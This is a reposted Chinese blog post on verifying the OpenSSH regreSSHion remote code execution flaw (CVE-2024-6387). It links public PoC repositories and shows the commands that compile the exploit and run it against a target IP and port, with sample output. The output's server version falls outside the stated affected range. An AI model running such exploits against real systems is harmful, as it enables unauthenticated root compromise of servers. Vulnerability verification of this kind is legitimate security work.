0
0

SSH远程命令执行漏洞(CVE-2024-6387)验证

0x01、漏洞名称

OpenSSH远程代码执行漏洞 (CVE-2024-6387)

0x02、漏洞简介

​ OpenSSH是SSH(Secure SHell)协议的开源实现,它通过不安全的网络在两个不受信任的主机之间提供安全的加密通信。OpenSSH 广泛用于基于Unix 的系统,通常用于安全远程登录和远程文件传输,以及其它网络服务。OpenSSH 远程代码执行漏洞(CVE-2024-6387),该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。

受影响版本:8.5p1 <= OpenSSH < 9.8p1

0x03、漏洞利用poc

https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc

0x04、漏洞验证

将poc编译成可执行文件

gcc -o exploit 7etsuo-regreSSHion.c

对目标进行验证

./exploit ip 端口
./exploit 192.168.24.139 22

返回结果

Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer
标签: ssh 运维
本文转载自: https://blog.csdn.net/qq_45554491/article/details/140131570
版权归原作者 小镇航海家 所有, 如有侵权,请联系我们删除。
登录后发布评论

“SSH远程命令执行漏洞(CVE-2024-6387)验证”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

功能安全实战系列-DFA(Dependent Failure Analysis)分析

Apifox接口项目搭建、管理优化方案报告

关于Pycharm 2024 激活出现的问题

VSCode Git Graph 插件使用教程

RabbitMQ 优点和缺点

Kafka 的零拷贝原理

Hadoop的汽车销量数据分析系统

文章导航